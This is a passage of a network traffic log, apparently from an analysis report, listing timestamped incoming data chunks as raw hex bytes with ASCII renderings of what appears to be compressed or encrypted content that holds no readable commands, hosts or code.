2023-11-18 09:02:40 UTC	2068	IN	Data Raw: b5 6e 54 be f3 d2 a1 43 df 88 96 af b0 18 b1 f6 ee ac 2d 86 db 17 16 5b 14 5e 78 df 6f c7 ea b1 ef 7b 9f 98 b8 f7 5d 8f e9 99 09 dd 96 76 37 b9 5f 97 fc e3 6b a6 61 94 c1 c3 6f 7d 18 29 1e 85 fe ef 25 d9 99 3f 57 6f 55 cd 6d 7c 3b 7d ae 2d 31 3d 4f ed 16 e1 b7 66 ed c5 dc 89 fe 76 e7 a6 ed 7a 91 3c ee f8 e7 fe a5 c7 d7 b9 55 1e f0 89 70 2c f3 d3 35 aa e0 74 79 46 38 d9 1c dd 76 be c9 e4 9a 64 d3 f7 c6 b8 96 43 c9 fa 7b 9f 95 26 ce fd d0 39 eb fd 87 f2 a2 90 b9 2b 3f 9e cf c8 5d 2a 9d b0 7a b0 47 55 97 21 87 b7 d2 03 52 ee 54 5c d8 69 7b 79 e1 c1 9c 93 e8 f6 d3 b7 a2 37 45 6e b5 47 8d 57 55 b3 fa 2d c9 7c b2 34 d2 6c 4e b6 87 f5 bb f4 5b f9 2f f7 1a ee 7c 7e db f1 f6 c8 c6 21 b3 c5 ea 57 6b 5a 43 4d 47 6b ae 73 5d 97 5a d3 a9 53 14 6a e9 f1 c3 7b b4 e3 a4 Data Ascii: nTC-[^xo{]v7_kao})%?WoUm\|;}-1=Ofvz<Up,5tyF8vdC{&9+?]*zGU!RT\i{y7EnGWU-\|4lN[/\|~!WkZCMGks]ZSj{
2023-11-18 09:02:40 UTC	2084	IN	Data Raw: d1 94 c3 63 0a 84 e4 d5 0f 39 4a 22 90 90 b7 22 05 f8 7a 4d 76 fb 54 36 8c f8 b8 31 14 88 e5 7f 34 64 8e 78 6d 43 b2 5a d5 3e 64 c7 e0 33 b9 7c f2 ce ad 18 39 05 e1 e3 bd 4b 00 52 c2 71 f0 96 3f 6e ea 03 da cb bd ed 66 80 ec 10 c4 c3 4c b2 34 f0 00 79 87 48 fe 18 24 79 c4 46 19 31 f4 a2 0c 19 e4 53 5b 12 bc 62 f6 78 40 1d 5f 7b b7 fd c6 aa b8 1b 20 3f 8c 0d e4 37 78 0c a9 d1 e4 cf e3 d2 58 96 ec 9e 91 41 90 b7 27 1e 87 fc 71 95 8f 8c 15 24 28 7e 1d 50 cc 4a de f4 f6 f0 f1 0f c5 c7 59 34 97 a1 68 1b 79 62 d9 2f 93 62 b2 b9 25 5b 1a d9 9f 42 92 97 99 5c d9 63 84 06 21 7e 6e 6d 73 91 bf ef 92 d7 c5 b1 02 f9 b3 b9 b2 ff 50 41 24 8f 4d 5e f0 33 0c 82 7d fc 83 82 f0 44 01 f8 1c c8 fb db a9 02 14 53 21 74 2f da 1f 7d c5 d1 9d e7 8f ac 70 c4 e2 c8 c0 e1 8b b7 27 Data Ascii: c9J""zMvT614dxmCZ>d3\|9KRq?nfL4yH$yF1S[bx@_{ ?7xXA'q$(~PJY4hyb/b%[B\c!~nmsPA$M^3}DS!t/}p'
2023-11-18 09:02:40 UTC	2100	IN	Data Raw: e5 a4 90 cb 81 2f 3a a8 b5 ea 9c f2 c0 e9 a5 ea 9c 26 bf 19 6e c6 99 fd e6 88 b1 3a 45 85 f7 bc 9b a0 97 d0 1c f4 09 fa 1c d5 c5 0b c0 7b ad c5 9b f1 33 a4 16 ac cb 6f 64 01 7d 8b 95 80 34 bc 08 b8 fd a4 7d c1 2e 0c ae 1b 81 4e f5 73 86 38 29 fc 5d be 86 ef 81 64 f7 80 17 76 9f 74 6b bb 6d 81 e5 9b 7a 6d c2 d9 7e d1 9f e1 df 04 3e 77 80 cf 9b 67 ee 49 d9 21 6a ca 06 f2 92 bc 2e ab 40 4e 9e a9 56 02 87 45 e8 62 e1 be 8c ce 7a b4 4e 87 3c 95 d3 14 32 65 cd b3 c6 33 1d cc 28 48 07 a7 8d 95 12 65 25 87 1c d2 18 f5 40 23 d0 2b 68 05 da 86 f6 84 55 1a 8f 7b e1 d9 f8 53 9c 4a 96 92 28 ca c2 fd 25 cf d8 b5 81 4f c6 87 fb 07 4f 82 3f 97 ce 8b ce 51 c8 77 c5 dd 67 c1 27 4c 70 bf 74 9f 01 04 9c 13 c3 e5 c7 d2 d2 75 4c 3b d3 c5 a4 9a f7 cd 47 e1 3e 9f a8 e0 f6 ad 75 Data Ascii: /:&n:E{3od}4}.Ns8)]dvtkmzm~>wgI!j.@NVEbzN<2e3(He%@#+hU{SJ(%OO?Qwg'LptuL;G>u
2023-11-18 09:02:40 UTC	2116	IN	Data Raw: 8e b3 8d 3e 74 84 39 be 06 b3 15 0e c5 10 80 02 b4 75 01 0a 0b 6e f1 7f 79 3a 49 10 6f 3d cd 97 f6 71 05 fe 4c 7c 8c 4e 5d 7a 27 f8 23 b6 59 99 7a 21 76 49 aa 3f 6a 49 71 7b b6 cb ca aa 7e fe 85 24 cd 79 24 93 3b a7 9a 24 df d5 ef cd 44 0c 5b 73 33 26 29 01 2b cf 4c 02 53 02 aa 23 e8 81 dc c3 5e 52 29 a8 b5 19 7e aa c3 f0 b8 6a d8 57 fd f6 27 62 14 1e a6 7d 68 f7 14 55 47 68 19 b2 f6 33 e5 03 d5 53 78 b3 73 f1 90 60 6f 02 d9 eb fb d1 87 fc 8c 1a 0c 05 e3 1c 32 c4 3b a3 5a 8a 90 53 28 63 f5 82 ce 87 06 cf 95 3e 6e b5 0a 72 9f 37 51 c8 bd b9 c9 34 0d 62 12 31 fe 96 73 06 ec 92 1a 41 79 b3 92 8d 12 24 1f ba 18 0e 8b 3b 4e c1 cc d8 d7 d4 cb ee be bd b9 49 14 7c 78 49 7b 2b 51 90 95 22 8d 1c be 1a 0d 7c 7a 71 c1 46 12 f8 5a 1f 51 e8 7d 4c ae c9 6c e0 26 5a 5c Data Ascii: >t9uny:Io=qL\|N]z'#Yz!vI?jIq{~$y$;$D[s3&)+LS#^R)~jW'b}hUGh3Sxs`o2;ZS(c>nr7Q4b1sAy$;NI\|xI{+Q"\|zqFZQ}Ll&Z\
2023-11-18 09:02:40 UTC	2132	IN	Data Raw: 8e 47 26 5b 23 34 6b db ed 88 c7 02 ea 41 7e 30 8e d1 f4 2a 9c 7b f8 34 7c 37 31 5d ea 18 50 a3 0f eb 3d 61 f2 2e 3f 61 b2 ad d9 7b 3e 2c df c5 85 37 7a 0b e9 12 38 79 56 33 ab b5 9d cb ca 1f 84 14 ba e2 b4 39 b1 f9 3e 24 32 e8 fb 7f 54 3f 2f e7 d8 bc 78 58 ef af 60 71 a9 b7 3e 08 df ff 23 98 f8 c9 a4 2c ef 69 75 8f c3 e2 34 ba 0e 03 c4 52 a8 93 38 7e d9 75 34 7e c1 5e c6 ef 9a 42 2b 7e b8 7d 0f d3 47 8e 74 b6 61 c4 11 04 ff a2 4e 8d b0 b3 07 fc 4e fe 48 e4 09 df 6c 63 ed c3 0f 36 f7 b5 3f c8 23 0e 33 7f 37 c4 34 7b 00 d9 b8 02 da d7 fe 24 de 72 4d 68 76 76 ce 44 56 ec 24 92 da 85 e3 c3 42 d4 94 b9 05 2f b6 4e e1 ec 32 f1 02 38 8e 77 39 f0 ed ae f0 b7 47 d3 db 43 34 67 b2 2e e1 ed d8 0b 61 1c d1 f9 7a 94 8d 20 ac 2c e0 d8 1c d5 d5 ce 56 f9 26 a9 0e 23 ec Data Ascii: G&[#4kA~0*{4\|71]P=a.?a{>,7z8yV39>$2T?/xX`q>#,iu4R8~u4~^B+~}GtaNNHlc6?#374{$rMhvvDV$B/N28w9GC4g.az ,V&#
2023-11-18 09:02:40 UTC	2148	IN	Data Raw: f9 11 27 29 06 3c 7f 38 c5 67 27 79 c3 63 54 27 22 9d 96 98 78 88 7d 2c 38 6f b8 09 2c 3e fe 47 ae be d5 eb 8c f1 60 d9 41 f1 e0 64 78 38 f5 29 d8 bf af 0b b6 fa 5e 58 67 bc fa 78 33 85 ac 99 4f a0 99 6e eb 02 36 81 c7 ff 7b 25 9b 40 e6 51 dd 26 b0 39 70 f9 9d 3c da e6 26 30 e1 84 b0 fc 36 87 bc 09 1c 6e d6 6d 02 63 75 dd ce 3c 1a 7c 13 38 7d 5c 58 79 63 8d 36 81 2a ff ef db 04 7e 5a 6b 8c fe 44 86 fe 45 0c fd 29 ab e1 fe 73 ad b2 09 ac fe fd 9b 40 17 ff 1f 49 86 3d d7 1a 93 e1 bd 6c 00 ab d8 00 5e fa 84 0c e0 fb 35 c1 c8 f0 fb 35 c6 78 e0 cd 7c c2 9a 49 82 66 de 5d 63 6d 9f d3 9f 3a a2 e3 f4 06 a4 36 57 6e 93 d3 5f f4 1b 93 9a ca 73 d3 14 9e ab e7 f4 7f 3b 22 f0 5c 23 7a b3 ca 02 cf d5 71 fa 02 bf 01 bd 05 f0 dc 6f bf 0e c6 73 fb 36 07 3f 1e 89 2f 78 29 Data Ascii: ')<8g'ycT'"x},8o,>G`Adx8)^Xgx3On6{%@Q&9p<&06nmcu<\|8}\Xyc6*~ZkDE)s@I=l^55x\|If]cm:6Wn_s;"\#zqos6?/x)
2023-11-18 09:02:40 UTC	2164	IN	Data Raw: d8 57 ed 87 be 64 60 87 ad ba c4 de b1 4b b1 70 44 37 ef 59 97 c3 2f 03 a7 6b 7b 70 07 43 75 ad 5e 23 53 c5 be a8 d3 aa 62 af 88 e7 58 55 ec a3 23 56 0e f4 d8 19 57 9a 8a 5d 50 5e 16 77 49 2e 54 34 48 53 81 2b 90 cb d3 6b 9b 5d ab b7 a6 32 bc b3 70 ab a7 36 51 a1 a0 a5 42 0f 9f b1 54 68 76 a7 95 42 1f c5 32 55 e8 3f ce c8 0a dd 9d a3 28 fd 52 c1 cd 54 78 e8 6f 09 2a 3c 65 a9 c2 ce 98 a5 0a ab 3b ac 54 c8 ce 58 85 75 31 59 85 97 5d 30 71 52 06 f8 52 15 3f e8 24 0c 66 45 55 6f 93 f9 34 a4 27 f8 ba e4 97 85 58 ac 96 9e 2b 7e b3 21 d3 55 45 fe 21 02 d1 3d d0 be ba c5 af a1 54 e9 18 8b d1 9f bf fb e7 8b d1 90 98 2b 59 31 e2 4d b1 43 8b 54 e0 09 e7 52 c2 c3 c3 32 6f 0c b3 0f a5 6e 0c 17 51 63 f8 f3 03 ac 31 7c e7 60 ff 1a c3 a2 66 53 63 e8 a9 6a 1e 68 2e ff fc Data Ascii: Wd`KpD7Y/k{pCu^#SbXU#VW]P^wI.T4HS+k]2p6QBThvB2U?(RTxo*<e;TXu1Y]0qRR?$fEUo4'X+~!UE!=T+Y1MCTR2onQc1\|`fScjh.
2023-11-18 09:02:40 UTC	2180	IN	Data Raw: 22 2a d0 6c d9 75 d7 6c a7 be fd a9 bc 27 de 07 6f dd 37 82 de ed 86 c5 d6 c9 37 ad c9 be 11 3b 85 db bb ad a8 f5 a3 5a db 0e fa 23 22 09 eb e4 a7 f4 a0 19 80 c3 68 0f 8f 04 9a 9e 77 47 cd 4d 7b da 1d 7d 8e e5 17 3e 1e 23 ec 52 bb fb 90 36 d9 20 96 33 d1 e7 7f fc f1 20 e2 4e e6 a2 27 bb 7d 75 1d d6 fd b3 ca 5f 3e 3d 46 28 61 32 96 3d ce 7f d4 2c dc 65 39 67 05 01 6a 96 db 48 78 93 ff 38 2b 59 aa dd a8 9f b6 41 ea cb 42 00 a8 7c bc 0f 7d 6b a1 07 d9 7f 9e ba 25 81 9c 82 fd eb 93 36 9d 72 a9 78 88 dc dd 4a b0 92 fa 08 75 c1 65 99 9b 82 f1 10 5b 53 2b de 13 d4 e0 77 d2 7b 31 15 e1 9e 09 99 b1 14 e1 c7 88 cc 83 8d 70 2e 90 3e 2b ba 26 3c 09 e1 af fc 91 32 f2 47 db fe 09 19 b9 6a 5b 74 52 f4 14 75 b2 c3 b0 f8 c5 63 db 8c 26 88 67 d7 3f 32 1b 65 21 79 fb 3b 89 Data Ascii: "*lul'o77;Z#"hwGM{}>#R6 3 N'}u_>=F(a2=,e9gjHx8+YAB\|}k%6rxJue[S+w{1p.>+&<2Gj[tRuc&g?2e!y;
2023-11-18 09:02:40 UTC	2196	IN	Data Raw: 64 e1 37 68 80 1d 0d 2c 77 88 69 d0 d4 ae eb cc ed c9 f3 68 7f bf 6e 43 fa f9 e8 6a 59 52 4e bc 12 2a 68 ea 89 57 cc af 99 18 98 73 14 4c 02 80 f1 bc 02 da fe 3a 7d 14 af 9e 07 54 a1 7e 08 39 48 6c 83 bf ca db 6f e3 46 97 49 62 46 35 d9 4a 21 1a a2 cf d3 0e 5e 7a 1c 0d a6 07 ff da 74 82 6e af 89 a0 59 f3 b4 0c 71 c2 ae a0 b1 f8 60 65 dd 3d 64 45 c9 23 79 15 b3 19 da f0 34 5b 59 2f 58 78 a0 b1 f9 a4 3b 5e 57 73 3b db 5f 8f e4 9f c8 9e 79 10 0f 96 95 27 bf 29 ac ed dd 6d 08 bd f8 82 58 10 b4 e3 ca 2d f7 70 b2 48 6d a5 d1 c4 a7 19 b5 42 70 8b b5 b4 31 5d 0c 39 34 1d 18 3f 1c c3 70 42 da 75 62 e5 86 ea 91 4b dd d1 67 98 dc 8a d4 b0 13 b5 35 bb 0f 79 8a 4a 8d 70 c6 b2 7f 2d d9 1d 00 7a 6a 04 38 ee d4 a3 e3 ce 5c 36 c8 64 fa 66 00 ca 1a 86 2e 9b 09 6f f3 9e 92 Data Ascii: d7h,wihnCjYRN*hWsL:}T~9HloFIbF5J!^ztnYq`e=dE#y4[Y/Xx;^Ws;_y')mX-pHmBp1]94?pBubKg5yJp-zj8\6df.o
2023-11-18 09:02:40 UTC	2212	IN	Data Raw: 80 31 dd 1c f3 18 1e e1 6d 88 58 23 8d cf cb 90 12 87 b4 b3 cf d9 a4 20 e7 f6 5c 3d b7 01 05 6b d3 e5 fb 4f 5b c9 51 3f d8 30 c1 02 ad dd d4 d1 ee 95 79 f6 d5 09 7c 1e c0 b9 18 f2 78 e4 ed c2 20 ae da a3 27 b3 8f 47 d7 f1 df e6 67 3b 7b 91 9f 05 22 a5 c5 a9 5b e9 ca 20 67 8e 94 cd c1 0a 69 1a b5 2c 71 fe 7f d3 31 4f 0d 48 5e 70 f3 60 f2 3b a5 6b 3b f3 49 82 9e ae 4d 8f 81 74 23 3c 0b 3f 41 4d 74 78 32 b6 88 c4 45 59 90 bc 0e 9b ae 3a 09 37 e0 59 bc a9 36 d9 d6 15 a2 fe 53 14 4e b2 7b 65 a6 92 ba 12 a7 a3 17 6e 2d cb f8 72 fd a2 31 41 d3 a6 0a cc 6c 35 b8 33 5b d9 f7 30 b6 7a d2 c2 57 a8 33 06 01 f6 d3 d2 bc b0 2d 0a 76 eb 89 7c b7 e6 5f a0 ee 99 1d e3 8f 35 3a e0 dd 2f 3d 0b 06 fd 94 18 f4 45 c2 fd 75 ab 2c 05 71 da db f8 27 c8 46 3c a9 47 a6 51 36 e0 55 Data Ascii: 1mX# \=kO[Q?0y\|x 'Gg;{"[ gi,q1OH^p`;k;IMt#<?AMtx2EY:7Y6SN{en-r1Al53[0zW3-v\|_5:/=Eu,q'F<GQ6U
2023-11-18 09:02:40 UTC	2228	IN	Data Raw: 89 d0 0e e5 90 3c 92 04 b6 e5 06 cf 8d 4c 39 5a 4f 3e 26 e2 04 a7 0d de ac 5d a7 81 16 70 17 4f 15 70 e1 6a fc 8c 89 90 63 0c 0b e6 1c c4 ba fc b8 14 25 43 2b 07 29 5b bd 7b 9d a9 70 6c 7d 60 b2 54 38 96 53 9d 20 f9 e3 25 e3 6e f4 2d c4 30 2e 9a f7 4f 2e 5c 7d 5d 02 8e 8d 98 74 16 ff c2 31 ef 21 84 b1 df 76 38 fb 2e db e1 33 9e ff 81 fb f8 05 d3 db b3 21 ef ae fa 96 dc 4f b7 7d 00 27 79 c4 53 e9 fe 42 b8 5f ec 48 a9 70 3a 1c 9e 2a f8 90 31 22 c9 53 9b c3 49 37 e4 7c 56 f6 5f b8 7f bf 8c 87 54 05 6b 90 f2 26 38 33 43 ca ad c0 70 b5 49 50 be 9f 4f 56 d8 e5 1c 4f 6e a1 d7 7a 3c 71 de 04 45 48 f0 bd 52 27 4c fc 1e c4 b7 e8 d2 50 cf 8e cc e5 5e 41 38 3e 2c 34 2e b2 ad 99 78 6d ab 3c 8e 65 bc ef a2 06 5e b9 2a 56 71 e1 84 60 a1 89 00 de 74 e2 9b 9f 9d 05 0d 1d Data Ascii: <L9ZO>&]pOpjc%C+)[{pl}`T8S %n-0.O.\}]t1!v8.3!O}'ySB_Hp:1"SI7\|V_Tk&83CpIPOVOnz<qEHR'LP^A8>,4.xm<e^Vq`t
2023-11-18 09:02:40 UTC	2244	IN	Data Raw: e8 94 2d ca 2a 78 59 65 82 6e 7d 10 1b 60 27 50 10 91 81 8b 48 ec 2d 3c b5 90 f7 e3 f9 98 04 27 ff 24 d7 f5 18 27 79 27 42 56 84 81 5d 8d 05 86 65 5b 83 18 13 bd e0 cb 38 28 08 88 1d 70 cc 89 0b 27 27 a7 f4 f2 67 96 43 70 87 a2 cc 26 38 8f 16 65 82 8b 55 52 51 66 05 f7 2d 8a 33 9f 73 6f bf de d4 39 9a 6e 81 0e 60 ef cc 3c 81 bd 0d 70 16 d4 f2 1a bd 90 78 0b ff e5 cf 70 a5 3b cb 5d 63 b5 5f 14 e8 b6 5c 10 fc 90 2f 8d ad 58 89 40 57 cd 73 08 68 ec 94 9e e5 d2 b2 0a e1 91 45 00 f6 36 31 0e c0 b5 98 7e 7b ab 27 0b ae 5c 72 5e 8f 1d 87 b2 d7 09 d0 f0 86 0e 34 1c a3 35 cc e0 91 6b 03 78 33 44 f9 b3 55 5f 56 0c 18 87 67 c5 81 53 43 56 02 e7 c3 e3 f3 fc 7c 81 0b b6 0f 1e 27 f2 7b 73 01 bc 0b c3 3a 5b b9 6d 89 01 7a ef dd 44 45 9c a7 a2 ea af dd ed c7 e6 9a ce 53 Data Ascii: -*xYen}`'PH-<'$'y'BV]e[8(p''gCp&8eURQf-3so9n`<pxp;]c_\/X@WshE61~{'\r^45kx3DU_VgSCV\|'{s:[mzDES
2023-11-18 09:02:40 UTC	2464	IN	Data Raw: b1 15 f9 9a a3 2a f2 3b 09 f9 2d 84 fc 4f 84 7c 2f 40 3e ff 28 6e ac 80 70 a0 ec b8 93 4f fe 06 8e 38 da 0b 7c 08 8e ae d5 99 d3 72 21 14 92 6c 14 9a e4 6d e2 e7 e4 a8 77 90 09 ad 16 52 f7 9a 75 f8 b6 b2 4b ae b3 0b 96 f6 60 dc 56 76 f9 15 39 f6 bc 43 a1 90 24 9f df c5 38 a4 9c bd ff 4b 9e ed 71 18 f9 71 72 fe db 22 3f ce c8 c7 7b e0 91 72 fe 42 3f ff 30 e5 c7 1a f9 5c 0c 53 43 fe e3 83 93 e8 47 c6 81 ab cd 87 7a f4 1e 6f f6 d6 67 e7 a5 de 32 5e c4 ab 19 07 ae 4e d3 6b b2 ca 11 06 57 62 a8 ad d2 f7 49 80 51 85 61 9f 05 b0 b9 64 de 47 ff 78 4d 16 c0 fb 18 e0 ff a7 ec 69 c0 a3 28 92 9d 25 bb 9b e5 58 6f 03 44 89 c8 9f ca 9d c9 03 94 3b 51 c9 c5 27 39 64 44 b8 c0 21 18 8c 08 7a 2a 8a 3f 78 20 6c 14 bd 04 a2 9b 68 d6 4d 30 2a 3c e2 99 53 7e 02 5f fc 7b 22 04 Data Ascii: ;-O\|/@>(npO8\|r!lmwRuK`Vv9C$8Kqqr"?{rB?0\SCGzog2^NkWbIQadGxMi(%XoD;Q'9dD!z?x lhM0*<S~_{"
2023-11-18 09:02:40 UTC	2496	IN	Data Raw: e7 01 d2 d0 2b 1f 80 cb 89 84 7c 47 50 b4 23 fa 46 eb 7a f1 4c 03 44 f3 5d 00 50 03 b5 a6 bb 88 34 87 fb 7d 47 d1 4f 29 0b e9 2e 22 99 95 55 65 21 c9 45 44 e8 1f fc 0b ac 32 17 83 8b 58 a3 b9 88 65 dc 9d 80 ff 96 fa 8e 92 8b 58 88 52 1e c3 82 c7 34 29 9f 58 08 46 cc 31 c9 f5 2b 09 91 eb 27 2c ea 07 d6 d8 24 87 ca 7b 32 27 44 ae 5f 0e 36 54 69 88 bb 7e 50 3b f9 1b c7 a5 7b c1 f5 6b b7 e8 df 38 ae 89 0e a9 a1 83 b6 e3 67 9e 7d 5f f7 72 1c a6 2e d6 3b 87 f2 b8 f2 7d f4 99 3d 6e 74 b2 e4 11 6a f1 02 26 77 7e bb ff 57 1c da b3 0d 0c 6d 8b 67 28 fd b2 15 3b 11 92 03 01 64 32 4e 85 c3 db bd 3d 71 10 60 b1 2d a0 70 b4 0a cc 66 75 f8 1e c5 e2 22 ab c2 b3 8e 2a de 03 39 f4 d3 a7 62 24 0c d3 0f f3 f3 8e 64 e9 41 0a 8e d2 d0 c8 19 60 68 cc bc c6 a6 54 e6 76 c9 28 24 Data Ascii: +\|GP#FzLD]P4}GO)."Ue!ED2XeXR4)XF1+',${2'D_6Ti~P;{k8g}_r.;}=ntj&w~Wmg(;d2N=q`-pfu"*9b$dA`hTv($
2023-11-18 09:02:40 UTC	2528	IN	Data Raw: 11 50 de 2f 04 69 5e 30 9f 55 c3 70 36 19 64 22 18 11 30 2d 2d 77 ee 12 6e ab 3c c0 74 97 86 e9 56 58 57 49 62 f7 5b 14 a7 4b ec 72 e7 56 8e d7 2e 86 d7 ae 41 ce 52 70 5b e5 79 9c 07 d8 a1 44 c5 c7 36 00 5e 07 08 2f 1c 14 be 1e b0 90 41 d9 09 9f 84 a3 1f 78 87 87 c1 60 12 f8 b9 02 0c 83 e9 a7 36 f6 b7 d1 ad 3a c4 fd 89 4b 0d fa 55 27 24 df 61 ba b4 2c 19 00 e9 6e 49 28 da 8b f8 50 d8 45 80 63 b2 0e 86 74 1e b1 14 fe 8f fd c5 7c 7b e9 b7 f9 78 99 77 10 79 db de e7 77 fe bc 34 46 a5 d5 36 6b e6 13 d3 0a 91 b4 e6 b5 50 01 8d 67 7f 47 2e cb 2a 65 c5 28 fa 6e 8b d3 4e 4a 62 95 60 dd 4a 62 dd 84 cc c0 76 ff aa a9 4c 1a f7 d1 90 c1 9a ee 04 31 6a 5d 08 f5 49 0d 75 25 d1 77 f7 3b 75 e7 c6 4d 33 78 0b 9b af 33 80 3f 6b d3 c0 87 41 3d 59 ba 6d 2c e4 f9 55 c2 cc a4 Data Ascii: P/i^0Up6d"0--wn<tVXWIb[KrV.ARp[yD6^/Ax`6:KU'$a,nI(PEct\|{xwyw4F6kPgG.*e(nNJb`JbvL1j]Iu%w;uM3x3?kA=Ym,U
2023-11-18 09:02:40 UTC	2544	IN	Data Raw: 22 5e cf 6e 54 87 af 19 2f 6b f3 d6 ab a6 2f 55 be 46 ec c2 0d c2 18 2a 5a d1 5a 6c 57 dd ef 1e ea 06 c5 7b 3e 60 72 f6 1c 88 8b e6 b5 34 fb 2b c5 12 ee 7b 4a d4 df 44 b8 85 12 dc 39 5d c3 45 df 7a cf 07 e0 55 dc 4c 02 ea c9 6c b4 e2 05 73 93 b3 30 11 0c d9 33 55 99 0d c5 96 d9 3a 94 7e cd d0 fb f0 a6 14 39 d9 59 9d 4e 66 43 24 b3 9a d9 d8 fa a5 22 27 3b 0b 58 24 6e 87 a5 44 ef d5 fa 44 ef 1c ab a6 1d 0f 56 a7 68 da 51 c5 4a 89 de 31 9f 59 b5 bc 98 fa 76 2a f2 62 1a 90 85 76 46 df 2e 66 4a fa 63 da 4c 69 8e 39 53 fa f6 78 a6 9c ee 23 a5 e7 ea a2 14 0a 16 c8 91 6d 39 25 6c 98 c3 97 ed 34 b7 e5 d4 73 19 88 b7 2c e5 32 b0 8d d6 bc 2d 9f c7 ba 28 ad b6 c1 8a 1d 30 c1 b1 e9 0b 73 1c 5f 18 70 7c 4e 38 ee 8f 89 63 82 8d 6b a7 79 41 9e 61 e2 5e ba fb ce 9a 00 19 Data Ascii: "^nT/k/UFZZlW{>`r4+{JD9]EzULls03U:~9YNfC$"';X$nDDVhQJ1YvbvF.fJcLi9Sx#m9%l4s,2-(0s_p\|N8ckyAa^
2023-11-18 09:02:40 UTC	2576	IN	Data Raw: db f8 05 51 ce ba d2 3a f6 cf bb ae b4 1e 02 89 d7 61 fe 54 d7 ba d2 b0 2e 32 46 19 c6 82 fd 4e 4f e5 36 95 3f ac 75 43 44 7f bf ea a9 0c 3a f8 c3 5a c6 82 d1 64 00 b9 73 83 fd 0e 4f 55 37 9e 99 75 f0 6e 8a 93 52 4b 54 8d 75 52 e6 57 33 2f d7 a5 23 14 31 2f 97 cd 34 cf cb 16 17 ec 4b f5 97 2e d8 c6 83 2a af 6c 05 60 ca 86 03 8a 3c 95 ef 18 74 b0 89 83 dd 04 60 e1 3b d6 d1 b7 bc a3 03 d0 91 e0 e2 7e dc d2 59 81 d0 59 88 27 e8 b8 9a f5 a5 3d 7b 14 88 c3 53 d9 ca 51 72 f2 04 32 d0 c7 46 be c6 40 6c 55 3b 6b d4 fd 85 83 66 32 17 4a 18 7a f5 58 07 26 2b 4f c3 ec 87 cd 83 0e f2 4d 00 3b 45 55 14 da a6 ab ae 90 11 7c 6d b3 89 e0 65 cd 83 23 f8 06 80 b7 53 1f d6 8d 21 9e 25 8c 02 79 4a 50 6b 0c cc 65 8d 2b 18 2c 2d 94 6b af d2 d1 7f d7 41 ea a8 9e 5c e8 a6 8e 71 Data Ascii: Q:aT.2FNO6?uCD:ZdsOU7unRKTuRW3/#1/4K.*l`<t`;~YY'={SQr2F@lU;kf2JzX&+OM;EU\|me#S!%yJPke+,-kA\q
2023-11-18 09:02:40 UTC	2608	IN	Data Raw: 47 58 5a a7 a7 e4 f7 00 2e 0a 3c 38 30 72 0b ed 28 0a f4 40 81 0f 0f e4 7e 01 46 4b ab f7 e1 27 c0 b9 03 da 5d 43 3e 29 ab 1b 51 ae 8b 28 6b eb af 58 59 5d 07 5a 5a 1a d9 0d b0 7b 49 2c b1 ef f9 8c 99 1c 93 5c 7c 69 ba e2 e2 ef b5 61 84 df 06 61 ba 2f 1e 2d 37 a7 4c f8 91 c6 7f 8d fc 2e 06 a9 22 18 cb 7e 54 07 f2 df 2f 8e 41 05 19 97 c5 82 33 80 e0 fc 61 71 64 51 36 bd 34 96 8a d2 4a d5 99 bb 38 86 51 2b c9 e2 db 7c 83 b7 45 ae 08 75 e1 3f e5 48 51 64 2c b3 08 79 4e 64 21 e3 17 2e 31 85 6b fa 81 08 f7 fe 5d 91 48 1c fd 14 af 2e aa 65 2e e8 16 cf a3 d7 e1 47 a4 d6 55 8d 2e 3a 28 99 53 d0 53 de d3 65 18 ea 24 40 32 ff 99 59 2b c6 d0 a2 c9 08 a2 b6 92 71 89 5a 66 0d c8 46 15 44 de 11 b4 12 f7 eb 95 9e 67 62 05 8b f7 ba f4 70 e7 09 52 2f c2 f6 d4 7a d6 3c 6e Data Ascii: GXZ.<80r(@~FK']C>)Q(kXY]ZZ{I,\\|iaa/-7L."~T/A3aqdQ64J8Q+\|Eu?HQd,yNd!.1k]H.e.GU.:(SSe$@2Y+qZfFDgbpR/z<n
2023-11-18 09:02:40 UTC	2640	IN	Data Raw: d5 1a 01 1c c9 f1 e4 8a e9 72 40 e9 a4 c5 ae 68 d0 d8 d7 83 c1 48 e7 52 fb d5 5c a8 2a 9a 54 a8 4f d8 52 22 6c bd d8 ff 5b 09 fb 7f 76 41 58 f8 a9 6c 9f 22 fb eb 11 cb 33 2a 2c d3 6b e9 74 39 c3 d2 a8 99 4b 59 d5 17 8a e5 d3 76 7d 2c 2b 09 cb 63 22 e6 3d 1f fc bf 76 63 14 d5 34 cb ae af 9a 04 a8 0f c5 fe 3f 80 32 2a a0 f8 8a 10 bf 35 cd af 59 18 a6 ef 05 66 f9 85 e0 c0 4f 9f ec b7 4a 5c 59 7d a0 2b a3 07 eb 30 27 30 db 05 91 d6 26 56 3a 8e 85 6e 13 60 e7 59 ef f1 47 cc 8a 38 0e d9 5d 8f b2 8b 8f 30 cd 6b 2c fb fa 3d d1 44 79 fe b7 da 3e e2 5e b9 e3 68 c1 8c c2 33 37 68 30 40 80 7a db 75 dc 57 8a 63 f4 f3 31 b6 f2 31 2a a7 9c 1e 7c cd ca eb d9 99 f8 c0 59 13 1f 6f a2 18 46 53 b0 89 27 44 71 bb 19 6d 9c 70 06 34 15 c8 0c 88 4f e0 0c 68 18 20 9f 79 e8 b7 82 Data Ascii: r@hHR\TOR"l[vAXl"3,kt9KYv},+c"=vc4?25YfOJ\Y}+0'0&V:n`YG8]0k,=Dy>^h37h0@zuWc11\|YoFS'Dqmp4Oh y
2023-11-18 09:02:40 UTC	2672	IN	Data Raw: c7 73 81 be 4e 15 d6 91 ef 76 b8 3d e5 7c 8c 5d f0 2c 1a dc 96 51 4a 4f c9 9a 13 75 78 56 6e fe d7 bc 22 df ee 9b a3 d4 26 0f f4 d8 06 d3 2c ce 31 2c 12 ba 5d af 86 4f d4 e0 6b 3c 4c 1e 87 55 b9 85 d2 29 85 9e 1d 67 74 fd f4 d1 0f 36 85 4c 62 4c e3 8a 40 1a 86 02 83 6c 6f 10 f7 2b 00 b7 b9 be 16 48 15 c7 2d de d5 3f 1a d0 61 2d a0 ab 65 40 98 0b 3a c3 9d 9d 28 65 b7 ba b3 53 a4 ec 26 77 b6 55 ca 6e 76 a3 11 b3 54 10 9c 2b 27 ff 0a 2f 63 1e 4c e1 bb 21 29 54 6e 87 f4 b5 ef 94 d9 9d 1b 10 cf 35 9a da e9 05 40 87 f4 b9 ef a4 d9 9d 1d 10 db 3d 53 8f d0 6f ad 9e 9b 47 b3 0a c7 7d df 62 85 3e c9 d9 6e 82 1c 63 04 d3 b4 fc 0f 30 ad 54 41 87 29 7f 27 29 d7 58 2c 98 05 41 ae ba 5d 30 e3 83 b4 dd 64 16 